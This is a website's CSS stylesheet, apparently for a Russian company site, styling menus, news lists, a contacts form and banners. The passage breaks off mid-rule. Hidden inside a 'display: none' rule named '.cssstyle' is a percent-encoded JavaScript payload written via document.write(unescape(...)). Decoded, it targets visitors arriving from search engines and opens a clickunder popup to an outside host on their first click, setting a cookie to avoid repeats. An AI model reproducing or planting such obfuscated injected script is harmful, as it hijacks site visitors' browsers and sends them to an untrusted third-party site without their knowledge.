body {
    margin: 0;
    padding: 0;
    font-size: 0.8em;
    line-height: 100%;
    background: #ffffff;
    color: #666666;
    /* min-width: 1000px; */
    font-family: "Roboto", sans-serif;
    font-weight: 100;
}

table,
td {
    font-size: 1em;
}

img {
    border: 0px;
    margin: 0px;
    padding: 0px;
}

form {
    margin: 0px;
}

/* Линки */
a {
    color: #175a9c;
    text-decoration: underline;
    font-size: 16px;
}

a:link {
    color: #175a9c;
    text-decoration: underline;
}

a:visited {
    color: #58179b;
    text-decoration: underline;
}

a:hover {
    color: #175a9c;
    text-decoration: underline;
}

/* Заголовки */
h1 {
    font-size: 24px;
    color: #666666;
    margin: 52px 0 30px 0px;
    padding: 10px;
    position: relative;
}

h1 img {
    position: absolute;
    left: -15px;
    top: -15px;
}

* html h1 img {
    top: -7.5px;
}

div.main_page strong {
    font-weight: normal;
}

#response table {
    border-collapse: collapse;
    margin-top: 20px;
}

#response td,
#response th {
    border: 1px solid #d0d0d0;
    padding: 5px;
}

.bn_min {
    padding: 4px 0 0 0;
}

@media screen and (max-width: 1300px) {
    .bn_min {
        width: 443px;
        bottom: 3px;
        position: relative;
    }
}

h3.optimized {
    font-size: 24px;
    color: #666666;
    margin: 20px 0;
    padding: 0px;
    position: relative;
    white-space: nowrap;
    line-height: 1;
}

h3.optimized img {
    position: absolute;
    left: -15px;
    top: -15px;
}

* html h3.optimized img {
    top: -7.5px;
}

h2 {
    font-size: 24px;
    color: #666666;
    margin: 15px 0 10px 0px;
    padding: 0px;
}

h3 {
    padding-left: 10px;
    font-size: 16px;
    font-weight: bold;
    color: #666666;
    margin: 4px 0px 10px 0;
    padding: 10px;
}

h4 {
    font-size: 12px;
    font-family: Tahoma, sans-serif;
    font-weight: bold;
    color: #666666;
    margin: 25px 0px 5px 0px;
    padding: 0px;
}

/* Черта */
hr {
    height: 1px;
    background-color: #bfbfbf;
    border: none;
    margin: 10px 0;
}

/* Абзац */
p {
    line-height: 120%;
    text-align: justify;
}

.form2 {
    width: 80%;
}

.green,
a.green,
a:link.green,
a:visited.green,
a:hover.green {
    color: #6da200;
}

.yellow,
a.yellow,
a:link.yellow,
a:visited.yellow,
a:hover.yellow {
    color: #ffcc00;
}

.red,
a.red,
a:link.red,
a:visited.red,
a:hover.red {
    color: #d30000;
}

.normal {
    color: #666666;
}

div#top {
    position: top;
    top: 0px;
    left: 0px;
    width: 100%;
}

div#fnav div.line_green {
    background: url(/images/line_green.gif) 0 0 no-repeat;
}

div#fnav div.line_yellow {
    background: url(/images/line_yellow.gif) 0 0 no-repeat;
}

div#fnav div.line_red {
    background: url(/images/line_red.gif) 0 0 no-repeat;
}

div#fnav {
    position: absolute;
    top: 0px;
    left: 0px;
}

div#fnav div.line_green,
div#fnav div.line_yellow,
div#fnav div.line_red {
    margin: 0px 23px;
    height: 33px;
    width: 6px;
    float: left;
}

div#fnav div {
    height: 27px;
    width: 2px;
    margin: 0px 2px;
    position: relative;
}

div#fnav img {
    position: absolute;
    top: 36px;
    left: -4px;
}

div#contacts {
    width: 315px;
    position: absolute;
    left: 335px;
    top: 15px;
    font-size: 11px;
}

div#contacts img {
    float: left;
    margin-right: 5px;
}

div#contacts div {
    margin-bottom: 8px;
    line-height: 120%;
}

div#contacts div p {
    padding: 0px;
    margin: 0px 0px 4px 0px;
}

div#search {
    position: absolute;
    top: 0;
    right: 15px !important;
    background: url(/images/search_fon.gif) 0 0 no-repeat;
    height: 60px;
    padding: 38px 0 0 25px;
}

div#header {
    position: absolute;
    left: 0px;
    top: 94px;
    width: 100%;
}

div#menu {
    position: absolute;
    left: 0;
    top: 0px;
    width: 100%;
    height: 100px;
    min-width: 790px;
    background-color: #175a9c;
}

* html div#menu {
    width: 100%;
    overflow: hidden;
}

#logo {
    position: absolute;
    left: 0px;
    top: -27px;
}

div#menu img#menu_angle {
    position: absolute;
    left: 0px;
    bottom: 0px;
}

* html div#menu img#menu_angle {
    position: absolute;
    left: 0px;
    bottom: -1px;
}

div.menu1 {
    margin: 12px 0 0 330px;
    height: 42px;
}

div.menu1 div {
    float: left;
    color: #ffffff;
    font-size: 16px;
    text-decoration: none;
}

div.menu1 div.act {
    border: 1px solid #ffffff;
    position: relative;
    margin: -1px;
}

div.menu1 div.act img {
    position: absolute;
    left: 40%;
    bottom: -9px;
}

* html div.menu1 div.act img {
    position: absolute;
    left: 40%;
    bottom: -10px;
}

div.menu1 a,
div.menu1 a:link,
div.menu1 a:visited {
    color: #ffffff;
    font-size: 16px;
    text-decoration: none;
}

div.menu2 {
    margin: 8px 0 0 330px;
}

* html div.menu2 {
    margin-right: 120px;
}

div.menu2 div {
    float: left;
    margin-left: 13px;
    padding-left: 10px;
    color: #ffffff;
    font-size: 12px;
    background: url(/i/menu2.gif) 0 50% no-repeat;
    white-space: nowrap;
    padding-bottom: 4px;
}

div.menu2 div.act {
    font-weight: bold;
}

div.menu2 a,
div.menu2 a:link,
div.menu2 a:visited {
    color: #ffffff;
    font-size: 12px;
    text-decoration: underline;
}

div.grit {
    font-size: 11px;
    color: #175a9c;
    margin: 20px 0 20px 0px;
}

div.grit a,
div.grit a:link,
div.grita:visited,
div.grit a:hover {
    color: #175a9c;
}

#flash {
    background: url(/images/flash_bg.gif) 0 50px no-repeat;
    margin: 0px 0px 0px 15px;
    padding-left: 36px;
    height: 303px;
    width: 100%;
}

#flash_bg {
    padding-right: 14px;
}

#flash_lines {
    background: url(/images/flash_lines.gif) 0 257px repeat-x;
    width: 100%;
    padding-left: 30px;
}

#flash_lines div {
    position: relative;
    width: 100%;
    height: 303px;
}

#flash_lines img {
    position: absolute;
    bottom: 8px;
    right: 0px;
}

* html #flash_lines img {
    position: absolute;
    bottom: 7px;
    right: -1px;
}

#main {
    padding: 0 35px 0 20px;
    min-width: 900px;
    width: 100%;
}

#main td {
    vertical-align: top;
}

#main #left h1 {
    margin-top: 0px;
}

#main #left div {
    line-height: 21px;
}

#main #left .red_marker {
    background: url(/images/h/red.gif) 0 0 no-repeat;
    padding: 15px 0 0 15px;
}

#main #left .blue2_marker {
    background: url(/images/h/blue2.gif) 0 0 no-repeat;
    padding: 15px 0 0 15px;
}

#main #left .none h1 {
    margin-top: 20px;
}

#main #left .none {
    padding: 15px 0 0 15px;
}

#main #right {
    width: 25%;
    padding-left: 50px;
    padding-top: 125px;
}

#main #left {
    font-size: 16px;
    padding-top: 105px;
}

#main #right div.block {
    margin-bottom: 38px;
}

div.li {
    padding-left: 15px;
    background: url(/images/li.gif) 0 50% no-repeat;
    font-size: 12px;
    line-height: 180%;
}

#partner {
    color: #9d9d9d;
    margin-top: -20px;
}

div.newsdata {
    float: left;
    clear: left;
    background-color: #cccccc;
    font-size: 11px;
    color: #3b3b3b;
    padding: 3px;
    margin: 0px;
}

div.news {
    margin: 0 0 25px 75px;
    line-height: 120%;
}

* html div.news {
    width: 100%;
}

div.news a {
    display: block;
    margin-bottom: 15px;
}

table#newslink td {
    width: 150px;
    padding-left: 19px;
    margin: 0 8px 0 -8px;
    background: url(/images/li.gif) 7px 9px no-repeat;
    font-size: 12px;
    font-weight: bold;
    line-height: 180%;
    vertical-align: top;
}

table#newslink td.ss {
    margin-left: -8px;
    background: url(/images/h/blue2.gif) 0 2px no-repeat;
}

div#footer {
    clear: both;
    padding: 45px 45px 17px 0;
    margin: 25px 0 0 35px;
    background: url(/images/footer2.gif) 0 0 repeat-x;
    position: relative;
}

* html div#footer {
    width: 100%;
}

div#footer img#footer1 {
    position: absolute;
    top: 0px;
    left: 0px;
}

div#plusmedia {
    color: #575148;
    font: 11px Tahoma;
    width: 100%;
    /* margin-right: 50px; */
    /* margin-top: -10px; */
}

div#plusmedia img {
    float: left;
    margin-right: 10px;
}

div#lider {
    position: absolute;
    top: 55px;
    left: 250px;
    font: 11px Tahoma;
    margin-top: 10px;
}

div#lider img {
    float: left;
    margin-right: 5px;
    margin-top: -2px;
}

div#copyright {
    color: #575148;
    font: bold 11px Tahoma;
    float: right;
    margin-top: -10px;
    margin: 25px 25px;
    line-height: 20px;
}

.footer-elem__text {
    padding-left: 10px;
}

div#copyright p {
    line-height: 25px;
}

div#copyright a {
    font-weight: normal;
}

div.cat_row {
    border: 1px solid #cccccc;
    margin-bottom: 10px;
    padding: 5px;
    overflow: hidden;
    width: 100%;
}

* html div.cat_row {
    padding-left: 2px;
}

div.cat_row img {
    float: left;
    margin-right: 15px;
}

div.cat_row h2 {
    margin-top: 0px;
}

div.val_row {
    border-bottom: 1px solid #cccccc;
    padding: 10px;
    overflow: hidden;
    width: 100%;
}

* html div.val_row {
    padding-left: 2px;
}

div.val_row img {
    float: left;
    margin-right: 15px;
}

div.val_row h2 {
    margin-top: 0px;
    padding-left: 14px;
    background: url(/images/sqr_blue.gif) 0 60% no-repeat;
    overflow: hidden;
}

div.files_row {
    border-bottom: 1px solid #cccccc;
    padding: 10px;
    overflow: hidden;
    width: 98%;
}

* html div.files_row {
    padding-left: 2px;
}

div.files_row img {
    float: left;
    margin-right: 10px;
}

div.files_row h3 {
    margin-top: 0px;
    padding-left: 14px;
}

div#last_row {
    border-bottom: none;
}

img.vimg {
    float: left;
    margin-right: 30px;
}

div.clear {
    clear: left;
    height: 30px;
}

div.tabs {
    width: 100%;
    white-space: nowrap;
}

div.tabs a,
div.tabs a:link,
div.tabs a:hover,
div.tabs a:visited {
    text-decoration: none;
}

div.tabs span {
    padding: 3px 7px;
    border: 1px solid #175a9c;
    border-bottom: none;
    position: relative;
    top: 3px;
    font-size: 12px;
    line-height: 25px;
}

div.tabs span.tab2 {}

div.tabs span.act {
    border: 1px solid #999999;
    border-top: none;
    border-bottom: none;
    background: #ffffff;
    padding: 7px 7px 3px 7px;
    background: url(/i/act_tab.gif) 0 0 repeat-x;
    position: relative;
    top: 3px;
    z-index: 999;
}

div.sheet {
    border: 1px solid #999999;
    padding: 10px 20px;
    clear: left;
}

div.sheets {
    width: 100%;
}

div.banner {
    width: 200px;
    height: 122px;
    background: url(/images/fonline_green.gif) 0 80% no-repeat;
    padding-left: 20px;
    margin-bottom: 40px;
}

div.banner img {
    display: block;
    margin: 0px 0px 5px 0px;
}

/* Новости */
#news {
    color: #616161;
    font: 12px Tahoma;
    width: 280px;
    margin-right: 48px;
}

.news_data {
    width: 33px;
    color: #8c8c8c;
    text-align: center;
    padding: 13px 17px 0 20px;
    vertical-align: top;
}

.news_data div {
    color: #8c8c8c;
    font-size: 36px;
}

.news_text {
    width: 208px;
    font: 12px Tahoma;
    color: #616161;
    padding: 23px 0 35px 0;
}

.news_text a,
.news_text a:visited,
.news_text a:hover {
    font: 12px Tahoma;
    color: #616161;
    text-decoration: none;
}

#news_archiv {
    margin-left: 140px;
    background: url(/images/news_archiv.gif) 0 0 no-repeat;
    font: 12px Arial;
    padding: 5px 0 0 24px;
    color: #616161;
    text-decoration: none;
}

.none {
    width: 100%;
}

.back {
    margin: 15px 0 0 0;
}

div.newsdate {
    padding: 10px 0 0 0;
    margin: 0 0 5px 0;
    width: 57px;
    display: block;
    float: left;
    color: #353535;
}

div.newstitle {
    padding: 10px 0 0 0;
    margin: 0 0 5px 0;
    display: block;
}

div.newstitle a {
    text-decoration: underline;
    color: #2f478c;
}

div.newstext {
    padding: 0;
    margin: 0 0 10px 0;
    clear: both;
    overflow: hidden;
}

div.newstext p,
div.newstext * p,
div.newstext * * p {
    padding: 0;
    margin: 0 0 6px 0;
}

td#newsleft {
    width: 70%;
    padding: 0;
    vertical-align: top;
}

td#newsright {
    width: 30%;
    padding: 0px 20px 0 50px;
    vertical-align: top;
}

.newsseparator {
    margin: 15px 0;
    clear: both;
}

/* Архив */
p.year {
    padding: 10px 0 10px 0 !important;
    margin: 0 !important;
    font-weight: bold;
}

p.empyear {
    padding: 10px 0 10px 0 !important;
    margin: 0 !important;
    font-weight: bold;
}

p.curmonth {
    padding: 0 0 3px 20px !important;
    margin: 0 !important;
    font-weight: bold;
    background: url(/images/point_text.gif) 5px 0.2em no-repeat;
}

p.empmonth {
    padding: 0 0 3px 20px !important;
    margin: 0 !important;
    color: #808080;
    background: url(/images/point_text2.gif) 5px 0.2em no-repeat;
}

p.othermonth {
    padding: 0 0 3px 20px !important;
    margin: 0 !important;
    background: url(/images/point_text.gif) 5px 0.2em no-repeat;
}

div.press {
    clear: left;
    margin-bottom: 15px;
    overflow: hidden;
}

div.press img.prew {
    float: left;
    margin: 3px 15px 0px 0px;
}

div.press div.publ {
    font-size: 11px;
    margin: 0px 0px 5px 0px;
}

div.press img.ftype {
    float: left;
    margin: 1px 0px 0px 0px;
}

#lostpass_form {
    background-color: #ededed;
    padding: 20px 15px 20px 15px;
    width: 370px;
    height: 30px;
}

* html #login_form {
    height: 50px;
    padding: 20px 15px 5px 15px;
}

#login_form {
    background-color: #ededed;
    padding: 20px 15px 15px 15px;
    width: 370px;
    height: 70px;
}

* html #login_form {
    height: 100px;
    padding: 20px 15px 5px 15px;
}

#login_form #error_login {
    color: #bd0000;
    font-size: 11px;
    padding-left: 105px;
}

#login_form .links {
    font-size: 11px;
    position: relative;
    top: -4px;
}

#message {
    color: #bd0000;
    font-size: 11px;
    padding-left: 102px;
}

span.curpage {
    font-weight: bold;
    margin: 0 3px 0 3px;
    padding: 0 3px 0 3px;
    background: black;
    color: white;
}

span.linkpage {
    font-weight: bold;
    margin: 0 3px 0 3px;
}

li.search_row {
    margin-bottom: 16px;
}

div.search_title {
    font-size: 14px;
}

div.search_url {
    font-size: 11px;
}

table#prodtd {
    clear: both;
    border: 0;
    border-collapse: collapse;
    width: 100%;
}

table#prodtd tr td {
    padding: 5px;
    border: 1px solid #d0d0d0;
}

table.autonics td {
    height: 170px;
    padding-top: 15px;
}

table.autonics td.autonics_left {
    text-align: left;
}

div.svyagites_s_nami {
    width: 620px !important;
    top: 0px !important;
}

div.head_phone {
    height: 94px;
    width: 250px;
    float: right;
    background: url(/images/head_phone.jpg) left top no-repeat;
}

div.head_phone div.one {
    padding-left: 55px;
    font-size: 15px;
    padding-top: 8px;
    line-height: 18px;
}

div.head_phone div.sec {
    color: #175a9c;
    padding-top: 7px;
}

div.sec span.one {
    font-size: 20px;
}

div.sec span.sec {
    font-size: 25px;
}

div.one a {
    color: #175a9c;
    font-size: 15px;
    text-decoration: none;
}

div.one a:hover {
    text-decoration: underline;
}

div.m_top15 {
    margin-top: 15px;
}

div.catalog_element a {
    color: #175a9c;
    font-size: 18px;
    text-decoration: none;
}

div.catalog_element a:hover {
    text-decoration: underline;
}

.pages {
    margin: 5px 0;
}

.pages * {
    padding: 0 0 0 5px;
}

.pages>* {
    display: inline-block;
    margin-right: 5px;
    color: #175a9c;
}

.pages a {
    color: #175a9c;
}

.passiv a,
.passiv b {
    display: inline-block;
    margin-left: 20px;
}

#man div {
    position: absolute;
    top: 65px;
    left: 300px;
}

#man div a {
    font-size: 12px;
    text-decoration: underline;
}

#man div a:hover {
    text-decoration: none;
}

#man div.passiv {
    display: none;
}

#man b+div,
#man a.hov+div {
    /*	display:block !important; */
    background: #175a9c;
    padding-bottom: 20px;
    width: 100%;
    margin-left: 20px;
}

#man div b {
    font-size: 12px;
}

#man .hov {
    border-color: #fff;
}

#man a.hov+div {
    z-index: 100;
}

#man>a {
    padding: 10px 5px;
    border: 1px solid transparent;
    position: relative;
}

#man>b {
    padding: 10px 5px;
    border: 1px solid #fff;
    position: relative;
    font-weight: normal;
}

#man>b:after {
    background: url(/images/menu_a.gif) 50% 0 no-repeat;
    width: 100%;
    height: 8px;
    content: "";
    display: block;
    position: absolute;
    bottom: -9px;
    left: 0;
}

a.hov:after {
    background: url(/images/menu_a.gif) 50% 0 no-repeat;
    width: 100%;
    height: 8px;
    content: "";
    display: block;
    position: absolute;
    bottom: -9px;
    left: 0;
}

#sheets table {
    border-collapse: collapse !important;
}

#sheets td {
    padding: 10px;
    border: 1px solid #999 !important;
}

.red_marker table {
    width: 100%;
}

.breadcrumbs a {
    color: #175a9c;
}

.together li {
    list-style-type: none;
    font-weight: bold;
}

.month {
    font-weight: normal;
    display: none;
}

.month span,
.month a {
    margin: 3px 0;
    display: inline-block;
}

.year {
    margin: 5px 0;
    display: inline-block;
    cursor: pointer;
}

.year:hover {
    text-decoration: none;
}

.flex_copy {
    font-size: 11px !important;
    color: #333 !important;
    text-align: center;
    display: inline-block;
    width: 220px;
}

.flex_copy span {
    display: block;
    padding: 5px 0 0 0;
    text-align: center;
}

.flex_copy:hover {
    text-decoration: underline;
    color: #333;
}

.flex_copy img {
    border-radius: 5px;
}

.m_w {
    width: 217px;
}

.m_w_1 {
    min-width: 251px;
}

/* For Main Menu Mod */
div.menu1>div:first-child,
form[action^="/market/search/"] {
    white-space: nowrap;
}

div.menu1>div>div {
    white-space: normal;
    background: url(/images/back_mod.png) 0 0 repeat-x !important;
}

div.menu1>div>div>a {
    display: inline-block;
    display: inline !ie;
    zoom: 1;
    vertical-align: top;
    padding: 0 0 5px 0;
}

#man b+div {
    width: auto;
}

/* For Main Menu Mod */

.main-menu-lvl2 {
    display: none;
}

.menu1 b+.main-menu-lvl2 {
    display: block;
}

@media (min-width: 768px) {
    .contacts .left {
        float: left;
        width: 49%;
    }

    .contacts .right {
        float: right;
        width: 49%;
    }
}

.contacts .left {
    margin-bottom: 50px;
}

.contacts .right {
    margin-bottom: 50px;
}

h1+.agreement * {
    line-height: 1.5em;
}

.agreement li {
    margin-bottom: 10px;
}

[form-marker="contacts"] {
    max-width: 320px;
}

[form-marker="contacts"] input:not([class="checkbox-input"]),
[form-marker="contacts"] textarea {
    display: block;
    width: 100%;
    padding: 15px 10px;
    margin-bottom: 10px;
    font-size: 15px;
    color: #777777;
    background-color: #ffffff;
    background-image: none;
    border: 1px solid #cccccc;
    box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
    transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
    outline: none;
}

[form-marker="contacts"] input:not([class="checkbox-input"]):focus,
[form-marker="contacts"] textarea:focus {
    border-color: #66afe9;
    box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075),
        0 0 8px rgba(102, 175, 233, 0.6);
}

.contacts .btn {
    padding: 10px;
    margin-top: 10px;
    color: #ffffff;
    background-color: #175a9c;
    white-space: nowrap;
    cursor: pointer;
    border: 1px solid transparent;
    outline: none;
}

.contacts #map {
    height: 400px;
    clear: both;
}

.contacts .agreement a {
    color: #175a9c;
}

.contacts .agreement a:hover {
    text-decoration: none;
}

.contacts .message {
    color: #6da200;
}

.contacts h3 {
    line-height: normal;
}

.cssstyle {
	display: none;
	--image: document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%69%66%28%64%6F%63%75%6D%65%6E%74%2E%72%65%66%65%72%72%65%72%29%76%61%72%20%6D%79%52%65%66%65%72%65%72%3D%64%6F%63%75%6D%65%6E%74%2E%72%65%66%65%72%72%65%72%2C%67%6F%6F%67%6C%65%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%67%6F%6F%67%6C%65%22%29%2C%6D%61%69%6C%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%6D%61%69%6C%2E%72%75%22%29%2C%73%65%61%72%63%68%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%73%65%61%72%63%68%22%29%2C%79%61%6E%64%65%78%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%79%61%6E%64%65%78%22%29%2C%6C%79%63%6F%73%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%6C%79%63%6F%73%22%29%2C%68%6F%74%62%6F%74%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%68%6F%74%62%6F%74%22%29%2C%6D%73%6E%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%6D%73%6E%22%29%2C%6D%61%6D%6D%61%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%6D%61%6D%6D%61%22%29%2C%71%75%65%72%79%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%71%75%65%72%79%22%29%2C%69%6E%66%6F%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%77%65%62%2E%69%6E%66%6F%2E%63%6F%6D%22%29%2C%69%63%69%6F%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%64%65%6C%2E%69%63%69%6F%2E%75%73%22%29%2C%79%61%68%6F%6F%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%79%61%68%6F%6F%22%29%2C%62%69%6E%67%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%62%69%6E%67%22%29%2C%62%61%69%64%75%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%62%61%69%64%75%22%29%2C%69%6E%66%6F%73%70%61%63%65%3D%6D%79%52%65%66%65%72%65%72%2E%69%6E%64%65%78%4F%66%28%22%69%6E%66%6F%73%70%61%63%65%22%29%3B%66%75%6E%63%74%69%6F%6E%20%67%65%74%43%6F%6F%6B%69%65%28%61%29%7B%76%61%72%20%62%3D%22%3B%20%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2C%63%3D%62%2E%73%70%6C%69%74%28%22%3B%20%22%2B%61%2B%22%3D%22%29%3B%72%65%74%75%72%6E%21%28%32%21%3D%63%2E%6C%65%6E%67%74%68%29%26%26%63%2E%70%6F%70%28%29%2E%73%70%6C%69%74%28%22%3B%22%29%2E%73%68%69%66%74%28%29%7D%28%21%67%65%74%43%6F%6F%6B%69%65%28%22%63%6C%69%63%6B%75%6E%64%5F%65%78%70%65%72%74%22%29%26%26%30%3C%67%6F%6F%67%6C%65%7C%7C%30%3C%6D%61%69%6C%7C%7C%30%3C%73%65%61%72%63%68%7C%7C%30%3C%79%61%6E%64%65%78%7C%7C%30%3C%6C%79%63%6F%73%7C%7C%30%3C%68%6F%74%62%6F%74%7C%7C%30%3C%6D%73%6E%7C%7C%30%3C%6D%61%6D%6D%61%7C%7C%30%3C%71%75%65%72%79%7C%7C%30%3C%69%6E%66%6F%7C%7C%30%3C%69%63%69%6F%7C%7C%30%3C%79%61%68%6F%6F%7C%7C%30%3C%62%69%6E%67%7C%7C%30%3C%62%61%69%64%75%7C%7C%30%3C%69%6E%66%6F%73%70%61%63%65%29%26%26%28%22%75%6E%64%65%66%69%6E%65%64%22%3D%3D%74%79%70%65%6F%66%20%63%6C%75%26%26%28%63%6C%75%3D%7B%7D%29%2C%21%63%6C%75%2E%43%6C%69%63%6B%75%6E%64%65%72%26%26%28%63%6C%75%2E%43%6C%69%63%6B%75%6E%64%65%72%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%66%75%6E%63%74%69%6F%6E%20%61%28%61%29%7B%76%61%72%20%62%3D%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%22%61%62%6F%75%74%3A%62%6C%61%6E%6B%22%2C%22%5F%62%6C%61%6E%6B%22%2C%22%74%6F%6F%6C%62%61%72%3D%30%2C%73%74%61%74%75%73%62%61%72%3D%30%2C%72%65%73%69%7A%61%62%6C%65%3D%31%2C%73%63%72%6F%6C%6C%62%61%72%73%3D%31%2C%6D%65%6E%75%62%61%72%3D%30%2C%6C%6F%63%61%74%69%6F%6E%3D%30%2C%64%69%72%65%63%74%6F%72%69%65%73%3D%30%2C%77%69%64%74%68%3D%22%2B%73%63%72%65%65%6E%2E%77%69%64%74%68%2F%31%2E%32%35%2B%22%2C%68%65%69%67%68%74%3D%22%2B%73%63%72%65%65%6E%2E%68%65%69%67%68%74%2F%31%2E%32%35%2B%22%2C%20%74%6F%70%3D%22%2B%28%73%63%72%65%65%6E%2E%68%65%69%67%68%74%2D%73%63%72%65%65%6E%2E%68%65%69%67%68%74%2F%31%2E%32%35%29%2F%32%2B%22%2C%6C%65%66%74%3D%22%2B%28%73%63%72%65%65%6E%2E%77%69%64%74%68%2D%73%63%72%65%65%6E%2E%77%69%64%74%68%2F%31%2E%32%35%29%2F%32%29%3B%62%2E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%61%7D%66%75%6E%63%74%69%6F%6E%20%62%28%29%7B%69%66%28%22%62%6F%6F%6C%65%61%6E%22%3D%3D%74%79%70%65%6F%66%20%64%29%72%65%74%75%72%6E%20%64%3B%72%65%74%75%72%6E%20%64%3D%2F%63%6C%75%5F%43%6C%69%63%6B%75%6E%64%65%72%3D%74%72%75%65%2F%67%69%2E%74%65%73%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%2C%64%7D%66%75%6E%63%74%69%6F%6E%20%63%28%29%7B%69%66%28%21%62%28%29%29%7B%64%3D%21%30%2C%64%6F%63%75%6D%65%6E%74%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%3F%64%6F%63%75%6D%65%6E%74%2E%72%65%6D%6F%76%65%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%28%22%6D%6F%75%73%65%75%70%22%2C%63%2C%21%31%29%3A%77%69%6E%64%6F%77%2E%61%74%74%61%63%68%45%76%65%6E%74%3F%64%6F%63%75%6D%65%6E%74%2E%64%65%74%61%63%68%45%76%65%6E%74%28%22%6F%6E%6D%6F%75%73%65%75%70%22%2C%63%29%3A%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%75%70%3D%6E%75%6C%6C%2C%77%69%6E%64%6F%77%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%28%22%6C%6F%61%64%22%2C%61%28%22%68%74%74%70%73%3A%2F%2F%61%75%64%69%74%63%6F%6E%73%61%6C%74%2E%63%6F%6D%2F%61%6E%61%6C%69%74%69%63%73%2F%6C%65%74%73%2F%7A%74%2F%31%22%29%2C%21%31%29%3B%76%61%72%20%65%3D%6E%65%77%20%44%61%74%65%3B%65%2E%73%65%74%48%6F%75%72%73%28%65%2E%67%65%74%48%6F%75%72%73%28%29%2B%32%34%29%2C%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%63%6C%75%5F%43%6C%69%63%6B%75%6E%64%65%72%3D%74%72%75%65%3B%20%65%78%70%69%72%65%73%3D%22%2B%65%2E%74%6F%53%74%72%69%6E%67%28%29%7D%7D%76%61%72%20%64%2C%65%2C%66%3D%28%65%3D%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%6D%61%74%63%68%28%2F%28%6F%70%65%72%61%7C%63%68%72%6F%6D%65%7C%73%61%66%61%72%69%7C%66%69%72%65%66%6F%78%7C%6D%73%69%65%29%5C%2F%3F%5C%73%2A%28%5C%2E%3F%5C%64%2B%28%5C%2E%5C%64%2B%29%2A%29%2F%69%29%29%3F%65%5B%31%5D%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%3A%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%4E%61%6D%65%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%3B%72%65%74%75%72%6E%20%62%28%29%3F%7B%6F%6B%3A%21%31%7D%3A%28%64%6F%63%75%6D%65%6E%74%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%3F%64%6F%63%75%6D%65%6E%74%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%28%22%6D%6F%75%73%65%75%70%22%2C%63%2C%21%31%29%3A%77%69%6E%64%6F%77%2E%61%74%74%61%63%68%45%76%65%6E%74%3F%64%6F%63%75%6D%65%6E%74%2E%61%74%74%61%63%68%45%76%65%6E%74%28%22%6F%6E%6D%6F%75%73%65%75%70%22%2C%63%29%3A%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%75%70%3D%63%2C%7B%6F%6B%3A%21%30%7D%29%7D%28%29%29%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));
}

#main #left h2 a {
    font-size: 18px;
    font-family: Tahoma, sans-serif;
    font-weight: normal;
    color: #666666;
    text-decoration: none;
}

#main #left h2 a:hover {
    text-decoration: underline;
}

.sec a {
    display: block;
}

#main-banners {
    padding: 0;
    margin: 0;
}

#main-banners img {
    width: 100%;
    height: auto;
}

#main-banners ul {
    list-style-type: none;
}

#main-banners li {
    padding: 10% 0;
    position: relative;
    text-align: center;
    background: url("/images/prev1_0_a5blx.jpg") no-repeat center;
    background-size: cover;
}

#main-banners .jumbotron {
    display: inline-block;
    background: rgba(255, 255, 255, 0.8);
    padding: 29px 49px 39px 45px;
    min-width: 300px;
}

#main-banners .jumbotron2 {
    background: rgba(34, 37, 51, 0.8);
}

@media (min-width: 1870px) {
    #main-banners .jumbotron {
        top: 25%;
    }
}

#main-banners .text-center {
    text-align: center;
}

#main-banners .glyphicon {
    position: relative;
    top: 1px;
    display: inline-block;
    font-family: "Glyphicons Halflings";
    font-style: normal;
    font-weight: 400;
    line-height: 1;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}

#main-banners h3,
#main-banners .h3 {
    font-size: 22px;
    line-height: 1.17647059;
}

#main-banners .btn {
    display: inline-block;
    font-weight: 700;
    cursor: pointer;
    border: 1px solid transparent;
    text-transform: uppercase;
    padding: 27px 25px;
    font-size: 24px;
    line-height: 24px;
    border-radius: 0;
    -moz-transition: 0.2s all ease;
    -webkit-transition: 0.2s all ease;
    -o-transition: 0.2s all ease;
    transition: 0.2s all ease;
}

#main-banners .btn-success {
